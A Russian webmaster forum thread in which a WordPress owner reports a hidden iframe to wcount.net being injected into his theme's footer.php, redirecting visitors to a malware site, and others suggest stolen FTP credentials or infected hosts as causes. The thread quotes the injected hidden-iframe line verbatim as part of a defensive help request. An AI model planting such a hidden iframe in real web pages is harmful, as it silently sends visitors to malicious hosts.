WordPress. В файлы темы(точнее в footer.php) дописывается строка переадресации. Help!

12
Милованов Ю.С
На сайте с 24.01.2008
Offline
196
2114

Здравствуйте, Уважаемые форумчане. У меня появилась одна очень интересная проблема:

В файл WordPress'овской темы (очень часто это footer.php) дописывается строка <html><body><div style="display:none"><iframe src="http://wcount.net/com/index.php" width="320" height="240"></iframe></div></body></html>. Сначала все было не так уж и плохо: в футер дописывалась эта строка, я заходил в редактор темы и благополучно удалял эту ссылку на пару дней. Потом эта строка стала появляться все чаще, и чаще... Теперь вообще критическая ситуация: захожу на свой сайт www.vaz-tuning.info и меня перекидывает на сайт wcount.net. Я успеваю посмотреть html код главной страницы. В самом конце кода, уже после закрывающего тега </html> в футере стоит та строка, про которую я писал чуть выше. Но все дело в том, что в редакторе тем я благополучно захожу в редактирование футера, и... и не вижу этой строки. Ее там нет! Не знаю что делать, я в панике:(

Да, кстати, не только на этом сайте такое. Все 3 сайта, которые на моем аккаунте находятся, имеют такую же проблему. Подскажи пожалуйста, может кто-нибудь с этим сталкивался?

Заранее спасибо!

С Уважением, Милованов Юрий.

Подпись))
PR
На сайте с 30.12.2007
Offline
93
#1
Милованов Ю.С:
и не вижу этой строки. Ее там нет! Не знаю что делать, я в панике

А она не должна быть похожей на эту. Там должно быть что-то типа:

<script>....</script>

Может быть в index.php или в других файлах. Находите, удаляете, меняете пароли на FTP и больше не сохраняете пароль в FTP менеджере.

UPD: У Вас хоть какой то антивирус установлен? :) А то я пробовал зайти на сайт с установленным KIS 7 и с Avast - с любым не заходит из-за перенаправления на вирус.

Sentoro
На сайте с 18.03.2007
Offline
149
#2

У вас вероятнее всего спёрли пароль на фтп, или вы использовали ифрейм партнёрки. Удаляете эту строку во всех индексных файлах (index) которые есть у вас на хостинге. И конечно же поменяйте пароль на фтп.

Продается СДЛ на тему инвестирования (http://www.telderi.ru/ru/viewsite/903457)
[Удален]
#3
Sentoro:
У вас вероятнее всего спёрли пароль на фтп,

Или вирусы на сервере. Недавно аналогичную ситуацию на МТ обсуждали. Рекомендую: мастерталк.ru/topic82844s0.html?p=750442. Первый пост на второй странице (от spinne) будет особенно полезен новичкам в сереверных делах и любителей установки ЦМС "от хостера".

S0meT1me
На сайте с 07.06.2008
Offline
109
#4

2 варианта:

1. Вирусняк или троян у вас на компе, нашёл адрес и пароль от ФТП и пишет туда гадость - проверяйте машину на вирусы.

2. Вирус у хостера. Отпишите хостеру или смените его на другого.

В любом случае, поменяйте пароли на ФТП.

[Удален]
#5
SeoNizator:
Рекомендую: мастерталк.ru/topic82844s0.html?p=750442.

Рекомендую делать нормальные активные ссылки.

[Удален]
#6
Psycho:
Рекомендую делать нормальные активные ссылки.

1. Не думаю, что модерам понравятся линки на "конкурентов" ;)

2. Здесь же не форум блондинок. Уверен, все в состоянии сделать правильный урл. (кто не в состоянии - тому не место на форуме посковых систем)

RaftKorn
На сайте с 20.03.2007
Offline
166
#7
1. Не думаю, что модерам понравятся линки на "конкурентов"

А я вот думаю им все равно.

2. Здесь же не форум блондинок. Уверен, все в состоянии сделать правильный урл. (кто не в состоянии - тому не место на форуме посковых систем)

А дело не в том. Есть такое понятие как удобство, ссылки для того и существуют, чтоб их нажать можно было.

Премиум верстка и дизайн под ключ ( https://searchengines.guru/ru/forum/1045270 )
DocWeb
На сайте с 23.04.2007
Offline
101
#8
SeoNizator:
1. Не думаю, что модерам понравятся линки на "конкурентов" ;)
2. Здесь же не форум блондинок. Уверен, все в состоянии сделать правильный урл. (кто не в состоянии - тому не место на форуме посковых систем)

1. не понравятся модерам ссылки - таки тему прибьют)

не вам домысливать за модеров-то))

2. главное - экономия чужого времени.

вы мое время сэкономили положив прямой урл - я вам респект и уважуха)

а если думаете что я не блондинка... то хоть оно и так) - но уже анреспект и неуважуха...

зачем чужое время тратить??

на связи, практически онлайн. почта для связи - dlya-svyazi @ list.ru °¤•Џ•¤° Бери ношу по себе, чтоб не падать при ходьбе (с) "Брат"
[Удален]
#9

DocWeb, RaftKorn, Psycho и все остальные прошу меня простить за то, что показав полезный (на мой взгляд) урл я доставил вам массу неудобств. 🙅 🙅 🙅

😂

Милованов Ю.С
На сайте с 24.01.2008
Offline
196
#10
PROGRAMMATOR:
<script>....</script>

Как раз там вообще ничего нет. При просмотре хтмл кода на главной странице сайта, та строка есть, а когда захожу в редактирование футера, то там вообще ничего нет! Вопрос такой: может быть какой-то вирус вне темы WP, который сам добавляет эту сроку лишь при просмотре веб-страницы? У меня кстати на всех 3 сайтах такое.

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий